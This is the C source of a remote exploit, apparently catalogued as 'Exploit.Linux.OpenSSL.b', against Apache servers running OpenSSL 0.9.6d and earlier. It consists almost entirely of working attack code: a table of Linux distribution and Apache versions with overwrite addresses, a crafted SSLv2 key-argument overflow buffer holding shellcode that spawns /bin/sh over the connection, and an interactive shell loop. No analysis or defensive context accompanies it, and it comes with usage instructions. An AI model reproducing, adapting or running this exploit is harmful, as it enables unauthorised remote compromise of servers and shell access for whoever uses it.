Exploit.Linux.OpenSSL.b

1. /*gcc -o t t.c -lcrypto
2.  *OpenSSL v0.9.6d and below remote exploit
3.  */
4. #include <stdio.h>
5. #include <unistd.h>
6. #include <string.h>
7. #include <fcntl.h>
8. #include <stdlib.h>
9. #include <stdarg.h>
10. #include <sys/ioctl.h>
11. #include <sys/types.h>
12. #include <sys/socket.h>
13. #include <netinet/in.h>
14. #include <sys/time.h>
15. #include <unistd.h>
16. #include <errno.h>
17. #include <netdb.h>
18. #include <arpa/telnet.h>
19. #include <sys/wait.h>
20. #include <signal.h>
21.  
22. #include <openssl/ssl.h>
23. #include <openssl/rsa.h>
24. #include <openssl/x509.h>
25. #include <openssl/evp.h>
26.  
27. unsigned long myip=0;
28.  
29. void conv(char *str,int len,unsigned long server) {
30.     memset(str,0,len);
31.     strcpy(str,(char*)inet_ntoa(*(struct in_addr*)&server));
32. }
33.  
34. void cleanup(char *buf) {
35.     while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
36.     while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
37.         unsigned long i;
38.         for (i=strlen(buf)+1;i>0;i--) buf[i-1]=buf[i];
39.     }
40. }
41.  
42. char *GetAddress(char *ip) {
43.     struct sockaddr_in sin;
44.     fd_set fds;
45.     int n,d,sock;
46.     char buf[1024];
47.     struct timeval tv;
48.     sock = socket(PF_INET, SOCK_STREAM, 0);
49.     sin.sin_family = PF_INET;
50.     sin.sin_addr.s_addr = inet_addr(ip);
51.     sin.sin_port = htons(80);
52.     if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
53.     write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
54.     tv.tv_sec = 15;
55.     tv.tv_usec = 0;
56.     FD_ZERO(&fds);
57.     FD_SET(sock, &fds);
58.     memset(buf, 0, sizeof(buf));
59.     if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
60.         if(FD_ISSET(sock, &fds)) {
61.             if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
62.             for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
63.                 char *start=buf+d+strlen("Server: ");
64.                 for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
65.                 cleanup(start);
66.                 return strdup(start);
67.             }
68.         }
69.     }
70.     return NULL;
71. }
72.  
73. #define ENC(c) ((c) ? ((c) & 077) + ' ': '`')
74.  
75. int sendch(int sock,int buf) {
76.     char a[2];
77.     int b=1;
78.     if (buf == '`' || buf == '\\' || buf == '$') {
79.         a[0]='\\';
80.         a[1]=0;
81.         b=write(sock,a,1);
82.     }
83.     if (b <= 0) return b;
84.     a[0]=buf;
85.     a[1]=0;
86.     return write(sock,a,1);
87. }
88.  
89. int writem(int sock, char *str) {
90.     return write(sock,str,strlen(str));
91. }
92.  
93.  
94. #define MAX_ARCH 21
95.  
96. struct archs {
97.     char *os;
98.     char *apache;
99.     int func_addr;
100. } architectures[] = {
101.     {"Gentoo", "1.3.24-r2", 0x08086c34},
102.     {"Debian Woody GNU/Linux 3.0", "1.3.26", 0x080863cc},
103.     {"Red-Hat 6.0", "1.3.6", 0x080707ec},
104.     {"Red-Hat 6.1", "1.3.9", 0x0808ccc4},
105.     {"Red-Hat 6.2", "1.3.12", 0x0808f614},
106.     {"Red-Hat 7.0", "1.3.12", 0x0809251c},
107.     {"Red-Hat 7.1", "1.3.19", 0x0809af8c},
108.     {"Red-Hat 7.2", "1.3.20", 0x080994d4},
109.     {"Redhat Linux 7.2 (apache-1.3.26 w/PHP)", "1.3.26", 0x08269988},
110.     {"Red-Hat 7.3", "1.3.26", 0x08161c14},
111.     {"Red-Hat 7.3", "1.3.23", 0x0808528c},
112.     {"Red-Hat", "1.3.22", 0x0808400c},
113.     {"SuSE Linux 7.0", "1.3.12", 0x0809f54c},
114.     {"SuSE Linux 7.1", "1.3.17", 0x08099984},
115.     {"SuSE Linux 7.2", "1.3.19", 0x08099ec8},
116.     {"SuSE Linux 7.3", "1.3.20", 0x08099da8},
117.     {"SuSE Linux 8.0", "1.3.23", 0x08086168},
118.     {"SuSE Linux 8.0#", "1.3.23", 0x080861c8},
119.     {"Mandrake Linux 7.1", "1.3.14", 0x0809d6c4},
120.     {"Mandrake Linux 8.0", "1.3.19", 0x0809ea98},
121.     {"Mandrake Linux 8.1", "1.3.20", 0x0809e97c},
122.     {"Mandrake Linux 8.2", "1.3.23", 0x08086580},
123.     {"Slackware 7.0", "1.3.26", 0x083d37fc},
124.     {"Slackware 8.1-stable", "1.3.26",0x080b2100},
125.     {NULL, NULL,0},
126. };
127.  
128. extern int errno;
129.  
130. int cipher;
131. int ciphers;
132.  
133. #define FINDSCKPORTOFS     208 + 12 + 46
134.  
135. unsigned char overwrite_session_id_length[] =
136.     "AAAA"
137.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
138.     "\x70\x00\x00\x00";
139.  
140. unsigned char overwrite_next_chunk[] =
141.     "AAAA"
142.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
143.     "AAAA"
144.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
145.     "AAAA"
146.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
147.     "AAAA"
148.     "\x00\x00\x00\x00"
149.     "\x00\x00\x00\x00"
150.     "AAAA"
151.     "\x01\x00\x00\x00"
152.     "AAAA"
153.     "AAAA"
154.     "AAAA"
155.     "\x00\x00\x00\x00"
156.     "AAAA"
157.     "\x00\x00\x00\x00"
158.     "\x00\x00\x00\x00\x00\x00\x00\x00"
159.     "AAAAAAAA"
160.  
161.     "\x00\x00\x00\x00"
162.     "\x11\x00\x00\x00"
163.     "fdfd"
164.     "bkbk"
165.     "\x10\x00\x00\x00"
166.     "\x10\x00\x00\x00"
167.  
168.     "\xeb\x0a\x90\x90"
169.     "\x90\x90\x90\x90"
170.     "\x90\x90\x90\x90"
171.  
172.     "\x31\xdb"
173.     "\x89\xe7"
174.     "\x8d\x77\x10"
175.     "\x89\x77\x04"
176.     "\x8d\x4f\x20"
177.     "\x89\x4f\x08"
178.     "\xb3\x10"
179.     "\x89\x19"
180.     "\x31\xc9"
181.     "\xb1\xff"
182.     "\x89\x0f"
183.     "\x51"
184.     "\x31\xc0"
185.     "\xb0\x66"
186.     "\xb3\x07"
187.     "\x89\xf9"
188.     "\xcd\x80"
189.     "\x59"
190.     "\x31\xdb"
191.     "\x39\xd8"
192.     "\x75\x0a"
193.     "\x66\xb8\x12\x34"
194.     "\x66\x39\x46\x02"
195.     "\x74\x02"
196.     "\xe2\xe0"
197.     "\x89\xcb"
198.     "\x31\xc9"
199.     "\xb1\x03"
200.     "\x31\xc0"
201.     "\xb0\x3f"
202.     "\x49"
203.     "\xcd\x80"
204.     "\x41"
205.     "\xe2\xf6"
206.  
207.     "\x31\xc9"
208.     "\xf7\xe1"
209.     "\x51"
210.     "\x5b"
211.     "\xb0\xa4"
212.     "\xcd\x80"
213.  
214.     "\x31\xc0"
215.     "\x50"
216.     "\x68""//sh"
217.     "\x68""/bin"
218.     "\x89\xe3"
219.     "\x50"
220.     "\x53"
221.     "\x89\xe1"
222.     "\x99"
223.     "\xb0\x0b"
224.     "\xcd\x80";
225.  
226. #define BUFSIZE 16384
227. #define CHALLENGE_LENGTH 16
228. #define RC4_KEY_LENGTH 16
229. #define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
230. #define n2s(c,s)    ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1]))    )),c+=2)
231. #define s2n(s,c)    ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
232.  
233. typedef struct {
234.     int sock;
235.     unsigned char challenge[CHALLENGE_LENGTH];
236.     unsigned char master_key[RC4_KEY_LENGTH];
237.     unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
238.     int conn_id_length;
239.     unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
240.     X509 *x509;
241.     unsigned char* read_key;
242.     unsigned char* write_key;
243.     RC4_KEY* rc4_read_key;
244.     RC4_KEY* rc4_write_key;
245.     int read_seq;
246.     int write_seq;
247.     int encrypted;
248. } ssl_conn;
249.  
250. long getip(char *hostname) {
251.     struct hostent *he;
252.     long ipaddr;
253.     if ((ipaddr = inet_addr(hostname)) < 0) {
254.         if ((he = gethostbyname(hostname)) == NULL) exit(-1);
255.         memcpy(&ipaddr, he->h_addr, he->h_length);
256.     }  
257.     return ipaddr;
258. }
259.  
260. int sh(int sock) {
261.     char localip[256], rcv[1024];
262.     fd_set rset;
263.     int maxfd, n;
264.  
265.        sleep(2);
266.        write(sock, "uname -a;id\n", strlen("uname -a;id\n"));
267.        while (1) {
268.             fd_set          fds;
269.             int             n;
270.             struct timeval  tv;
271.             char buf[1024];
272.            
273.             tv.tv_sec = 5;
274.             tv.tv_usec = 0;
275.  
276.             FD_ZERO(&fds);
277.             FD_SET(0, &fds);
278.             FD_SET(sock, &fds);
279.  
280.             memset(buf, 0, sizeof(buf));
281.             if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
282.                 if(FD_ISSET(sock, &fds)) {
283.                     if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
284.                         break;
285.  
286.                     write(1, buf, n);
287.                 }
288.  
289.                 if(FD_ISSET(0, &fds)) {
290.                     if((n = read(0, buf, sizeof(buf) - 1)) < 0)
291.                         exit(1);
292.  
293.                     write(sock, buf, n);
294.                 }
295.             }//end select
296.         }//end while
297.  
298. }
299.  
300. int get_local_port(int sock) {
301.     struct sockaddr_in s_in;
302.     unsigned int namelen = sizeof(s_in);
303.     if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) exit(1);
304.     return s_in.sin_port;
305. }
306.  
307. int connect_host(char* host, int port) {
308.     struct sockaddr_in s_in;
309.     int sock;
310.     s_in.sin_family = AF_INET;
311.     s_in.sin_addr.s_addr = getip(host);
312.     s_in.sin_port = htons(port);
313.     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) exit(1);
314.     alarm(10);
315.     if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) exit(1);
316.     alarm(0);
317.     return sock;
318. }
319.  
320. ssl_conn* ssl_connect_host(char* host, int port) {
321.     ssl_conn* ssl;
322.     if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) exit(1);
323.     ssl->encrypted = 0;
324.     ssl->write_seq = 0;
325.     ssl->read_seq = 0;
326.     ssl->sock = connect_host(host, port);
327.     return ssl;
328. }
329.  
330. char res_buf[30];
331.  
332. int read_data(int sock, unsigned char* buf, int len) {
333.     int l;
334.     int to_read = len;
335.     do {
336.         if ((l = read(sock, buf, to_read)) < 0) exit(1);
337.         to_read -= len;
338.     } while (to_read > 0);
339.     return len;
340. }
341.  
342. int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size) {
343.     int rec_len, padding;
344.     read_data(ssl->sock, buf, 2);
345.     if ((buf[0] & 0x80) == 0) {
346.         rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
347.         read_data(ssl->sock, &buf[2], 1);
348.         padding = (int)buf[2];
349.     }
350.     else {
351.         rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
352.         padding = 0;
353.     }
354.     if ((rec_len <= 0) || (rec_len > buf_size)) exit(1);
355.     read_data(ssl->sock, buf, rec_len);
356.     if (ssl->encrypted) {
357.         if (MD5_DIGEST_LENGTH + padding >= rec_len) {
358.             if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) return 0;
359.             else exit(1);
360.         }
361.         RC4(ssl->rc4_read_key, rec_len, buf, buf);
362.         rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
363.         memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
364.     }
365.     if (buf[0] == SSL2_MT_ERROR) {
366.         if (rec_len != 3) exit(1);
367.         else return 0;
368.     }
369.     return rec_len;
370. }
371.  
372. void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) {
373.     unsigned char buf[BUFSIZE];
374.     unsigned char* p;
375.     int tot_len;
376.     MD5_CTX ctx;
377.     int seq;
378.     if (ssl->encrypted) tot_len = rec_len + MD5_DIGEST_LENGTH;
379.     else tot_len = rec_len;
380.  
381.     if (2 + tot_len > BUFSIZE) exit(1);
382.  
383.     p = buf;
384.     s2n(tot_len, p);
385.  
386.     buf[0] = buf[0] | 0x80;
387.  
388.     if (ssl->encrypted) {
389.         seq = ntohl(ssl->write_seq);
390.  
391.         MD5_Init(&ctx);
392.         MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
393.         MD5_Update(&ctx, rec, rec_len);
394.         MD5_Update(&ctx, &seq, 4);
395.         MD5_Final(p, &ctx);
396.  
397.         p+=MD5_DIGEST_LENGTH;
398.  
399.         memcpy(p, rec, rec_len);
400.  
401.         RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
402.     }
403.     else memcpy(p, rec, rec_len);
404.  
405.     send(ssl->sock, buf, 2 + tot_len, 0);
406.  
407.     ssl->write_seq++;
408. }
409.  
410. void send_client_hello(ssl_conn *ssl) {
411.     int i;
412.     unsigned char buf[BUFSIZE] =
413.         "\x01"
414.         "\x00\x02"
415.         "\x00\x18"
416.         "\x00\x00"
417.         "\x00\x10"
418.         "\x07\x00\xc0\x05\x00\x80\x03\x00"
419.         "\x80\x01\x00\x80\x08\x00\x80\x06"
420.         "\x00\x40\x04\x00\x80\x02\x00\x80"
421.         "";
422.     for (i = 0; i < CHALLENGE_LENGTH; i++) ssl->challenge[i] = (unsigned char) (rand() >> 24);
423.     memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
424.     send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
425. }
426.  
427. void get_server_hello(ssl_conn* ssl) {
428.     unsigned char buf[BUFSIZE];
429.     unsigned char *p, *end;
430.     int len;
431.     int server_version, cert_length, cs_length, conn_id_length;
432.     int found;
433.  
434.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
435.     if (len < 11) exit(1);
436.  
437.     p = buf;
438.  
439.     if (*(p++) != SSL2_MT_SERVER_HELLO) exit(1);
440.     if (*(p++) != 0) exit(1);
441.     if (*(p++) != 1) exit(1);
442.     n2s(p, server_version);
443.     if (server_version != 2) exit(1);
444.  
445.     n2s(p, cert_length);
446.     n2s(p, cs_length);
447.     n2s(p, conn_id_length);
448.  
449.     if (len != 11 + cert_length + cs_length + conn_id_length) exit(1);
450.     ssl->x509 = NULL;
451.     ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
452.     if (ssl->x509 == NULL) exit(1);
453.     if (cs_length % 3 != 0) exit(1);
454.  
455.     found = 0;
456.     for (end=p+cs_length; p < end; p += 3) if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80)) found = 1;
457.  
458.     if (!found) exit(1);
459.  
460.     if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) exit(1);
461.  
462.     ssl->conn_id_length = conn_id_length;
463.     memcpy(ssl->conn_id, p, conn_id_length);
464. }
465.  
466. void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
467.     int encrypted_key_length, key_arg_length, record_length;
468.     unsigned char* p;
469.     int i;
470.     EVP_PKEY *pkey=NULL;
471.     unsigned char buf[BUFSIZE] =
472.         "\x02"
473.         "\x01\x00\x80"
474.         "\x00\x00"
475.         "\x00\x40"
476.         "\x00\x08";
477.     p = &buf[10];
478.     for (i = 0; i < RC4_KEY_LENGTH; i++) ssl->master_key[i] = (unsigned char) (rand() >> 24);
479.     pkey=X509_get_pubkey(ssl->x509);
480.     if (!pkey) exit(1);
481.     if (pkey->type != EVP_PKEY_RSA) exit(1);
482.     encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
483.     if (encrypted_key_length <= 0) exit(1);
484.     p += encrypted_key_length;
485.     if (key_arg_overwrite) {
486.         for (i = 0; i < 8; i++) *(p++) = (unsigned char) (rand() >> 24);
487.         memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
488.         key_arg_length = 8 + key_arg_overwrite_len;
489.     }
490.     else key_arg_length = 0;
491.     p = &buf[6];
492.     s2n(encrypted_key_length, p);
493.     s2n(key_arg_length, p);
494.     record_length = 10 + encrypted_key_length + key_arg_length;
495.     send_ssl_packet(ssl, buf, record_length);
496.     ssl->encrypted = 1;
497. }
498.  
499. void generate_key_material(ssl_conn* ssl) {
500.     unsigned int i;
501.     MD5_CTX ctx;
502.     unsigned char *km;
503.     unsigned char c='0';
504.     km=ssl->key_material;
505.     for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
506.         MD5_Init(&ctx);
507.         MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
508.         MD5_Update(&ctx,&c,1);
509.         c++;
510.         MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
511.         MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
512.         MD5_Final(km,&ctx);
513.         km+=MD5_DIGEST_LENGTH;
514.     }
515. }
516.  
517. void generate_session_keys(ssl_conn* ssl) {
518.     generate_key_material(ssl);
519.     ssl->read_key = &(ssl->key_material[0]);
520.     ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
521.     RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
522.     ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
523.     ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
524.     RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
525. }
526.  
527. void get_server_verify(ssl_conn* ssl) {
528.     unsigned char buf[BUFSIZE];
529.     int len;
530.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
531.     if (len != 1 + CHALLENGE_LENGTH) exit(1);
532.     if (buf[0] != SSL2_MT_SERVER_VERIFY) exit(1);
533.     if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) exit(1);
534. }
535.  
536. void send_client_finished(ssl_conn* ssl) {
537.     unsigned char buf[BUFSIZE];
538.     buf[0] = SSL2_MT_CLIENT_FINISHED;
539.     memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
540.     send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
541. }
542.  
543. void get_server_finished(ssl_conn* ssl) {
544.     unsigned char buf[BUFSIZE];
545.     int len;
546.     int i;
547.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
548.     if (buf[0] != SSL2_MT_SERVER_FINISHED) exit(1);
549.     if (len <= 112) exit(1);
550.     cipher = *(int*)&buf[101];
551.     ciphers = *(int*)&buf[109];
552. }
553.  
554. void get_server_error(ssl_conn* ssl) {
555.     unsigned char buf[BUFSIZE];
556.     int len;
557.     if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) exit(1);
558. }
559.  
560. void exploit(int os,char *ip,int port) {
561.     int i;
562.     int arch=-1;
563.     int N = 20;
564.     ssl_conn* ssl1;
565.     ssl_conn* ssl2;
566.     char *a;
567.  
568.     alarm(3600);
569.    
570.     arch  = os ;
571.     if (os ==-1)
572.     {
573.         if ((a=GetAddress(ip)) == NULL) exit(0);
574.         if (strncmp(a,"Apache",6)) exit(0);
575.         for (i=0;architectures[i].os!=NULL;i++) {
576.             if (strstr(a,architectures[i].apache) && strstr(a,architectures[i].os)) {
577.                 arch=i;
578.                 break;
579.             }
580.         }
581.         if (arch == -1) arch=10;
582.     }
583.    
584.    
585.     srand(0x31337);
586.    
587.    
588.     for (i=0; i<N; i++) {
589.         connect_host(ip, port);
590.         usleep(100000);
591.     }
592.    
593.  
594.     ssl1 = ssl_connect_host(ip, port);
595.     ssl2 = ssl_connect_host(ip, port);
596.  
597.     send_client_hello(ssl1);
598.     get_server_hello(ssl1);
599.     send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
600.     generate_session_keys(ssl1);
601.     get_server_verify(ssl1);
602.     send_client_finished(ssl1);
603.     get_server_finished(ssl1);
604.  
605.     port = get_local_port(ssl2->sock);
606.     overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
607.     overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
608.  
609.     *(int*)&overwrite_next_chunk[156] = cipher;
610.     *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
611.     *(int*)&overwrite_next_chunk[196] = ciphers + 16;
612.  
613.     send_client_hello(ssl2);
614.     get_server_hello(ssl2);
615.  
616.     send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
617.     generate_session_keys(ssl2);
618.     get_server_verify(ssl2);
619.  
620.     for (i = 0; i < ssl2->conn_id_length; i++) ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
621.  
622.     send_client_finished(ssl2);
623.     get_server_error(ssl2);
624.  
625.     sh(ssl2->sock);
626.  
627.     close(ssl2->sock);
628.     close(ssl1->sock);
629.  
630.     exit(0);
631. }
632.  
633. int main(int argc, char * argv[])
634. {
635.     int port = 443;
636.     int os,i;
637.  
638.     if (argc < 3)
639.     {
640.     printf("APACHE + OPENSSL EXPLOIT\n\n");
641.     for (i=0;architectures[i].os!=NULL;i++)
642.         printf("target %d  %s %s %p\n",i,architectures[i].os,architectures[i].apache,architectures[i].func_addr);
643.        
644.     printf("\n");
645.     printf("usage:%s target hostip [port]\n",argv[0]);
646.     printf("usage:%s auto hostip [port] to auto select target\n",argv[0]);
647.     exit(0);
648.     }
649.     if (argc >3 )
650.     {
651.         port = atoi(argv[3]);
652.     }
653.    
654.     if (strcmp("auto",argv[1])==0)
655.         os = -1;
656.     else os =atoi(argv[1]);
657.  
658.     exploit(os,argv[2],port);
659.     return 0;
660. }